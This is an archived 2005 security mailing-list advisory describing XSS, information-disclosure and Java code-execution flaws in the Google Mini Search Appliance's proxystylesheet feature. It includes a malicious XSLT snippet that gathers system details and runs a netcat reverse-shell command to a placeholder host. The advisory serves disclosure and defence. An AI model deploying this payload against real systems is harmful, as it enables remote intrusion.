Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabili

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities (XSS, Information disclosure, Java Code Execution)
Date: 21 Nov 2005 16:18:38 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities 
(XSS, Information disclosure, Java Code Execution)
------------------------------------------------------------------------


SUMMARY

"The  <http://www.google.com/enterprise/> Google Mini offers 
cost-effective, high-quality search for your public website or intranet "

By supplying a malicious XSLT, attackers may execute arbitrary programs, 
retrieve system information or cause XSS vulnerability with Google mini 
appliance.

DETAILS

Vulnerable Systems:
 * Google Mini Search Appliance

The Google Search Appliance allows customization of the search interface 
through XSLT style sheets. Certain versions of the appliance allow a 
remote URL to be supplied as the path to the XSLT style sheet. This 
feature can be abused to perform cross-site scripting (XSS), file 
discovery, service enumeration, and arbitrary command execution.

The Google Search Appliance search interface uses the 'proxystylesheet' 
form variable to determine what style sheet to apply to the search 
results. This variable can be a local file name or a HTTP URL.

Error Message XSS:
A cross-site scripting flaw can be exploited by providing a snippet of 
malicious Javascript code for the proxystylesheet variable. The appliance 
will look for a local file by that name and then display an error message 
containing the Javascript code.

XSLT Style Sheet XSS:
A cross-site scripting flaw can be exploited by creating a malicious XSLT 
style sheet and specifying the URL to this style sheet in the 
proxystylesheet parameter. The appliance will download the style sheet and 
present the malicious Javascript to the user who executed the search.

Information disclosure 1:
It is possible to determine the existence of any file on the system by 
using a relative path from the style sheet directory. The error message 
returned from the server will disclose whether or not a valid path was 
provided. This can be used to fingerprint the base operating system and 
kernel version.

Information disclosure 2:
A rudimentary port scan can be performed by requesting HTTP URLs that 
point to a target system and individual ports on that system. The error 
message returned from the server will differ between open and closed 
ports. The appliance will ignore requests to connect back to itself, but 
no other restrictions apply.

XSLT Java Code Execution:
It is possible to execute arbitrary Java class methods on the appliance by 
creating a malicious XSLT style sheet. System commands can be executed as 
an unprivileged user, which combined with the vulnerable kernel version, 
can lead to a remote root shell. The appliance uses the Saxon XSLT parser, 
which allows the following snippet to work:

< !-- Google Mini XSLT Code Execution [metasploit] -->

XSLT Version: < xsl:value-of select="system-property('xsl:version')"/ >
< br / >
XSLT Vendor: < xsl:value-of select="system-property('xsl:vendor')" / >
< br / >
XSLT URL: < xsl:value-of select="system-property('xsl:vendor-url')" / >
< br / >
OS: < xsl:value-of select="sys:getProperty('os.name')" / >
< br / >
Version: < xsl:value-of select="sys:getProperty('os.version')" />
< br / >
Arch: < xsl:value-of select="sys:getProperty('os.arch')" / >
< br / >
UserName: < xsl:value-of select="sys:getProperty('user.name')" / >
< br / >
UserHome: < xsl:value-of select="sys:getProperty('user.home')" / >
< br / >
UserDir: < xsl:value-of select="sys:getProperty('user.dir')" / >
< br />

Executing command...< br / >
< xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS} 
255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" / >
  < /span >
< /xsl:template >

Vendor Status:
The vendor has issued a fix for customers.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:fdlist@digitaloffense.net> H 
D Moore.
The original article can be found at:  
<http://metasploit.com/research/vulns/google_proxystylesheet/> 
http://metasploit.com/research/vulns/google_proxystylesheet/
OSVDB advisories can be found at:  <http://osvdb.org/20977> 
http://osvdb.org/20977,  <http://osvdb.org/20978> http://osvdb.org/20978,  
<http://osvdb.org/20979> http://osvdb.org/20979,
 <http://osvdb.org/20980> http://osvdb.org/20980,  
<http://osvdb.org/20981> http://osvdb.org/20981
Google's Mini appliance security issues can be found at:  
<http://www.google.com/support/gsa/bin/answer.py?answer=15857> 
http://www.google.com/support/gsa/bin/answer.py?answer=15857



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities (XSS, Information disclosure, Java Code Execution), SecuriTeam <=
Previous by Date:  [EXPL] Multiple Vulnerabilities Google Search Appliance Proxystylesheet (Multiple XSS, Multiple Information disclosure, Java Code Execution, Exploit), SecuriTeam
Next by Date:  [NEWS] Cisco 7920 Wireless IP Phone Privileges Escalation and Information Disclosure, SecuriTeam
Previous by Thread:  [EXPL] Multiple Vulnerabilities Google Search Appliance Proxystylesheet (Multiple XSS, Multiple Information disclosure, Java Code Execution, Exploit), SecuriTeam
Next by Thread:  [NEWS] Cisco 7920 Wireless IP Phone Privileges Escalation and Information Disclosure, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]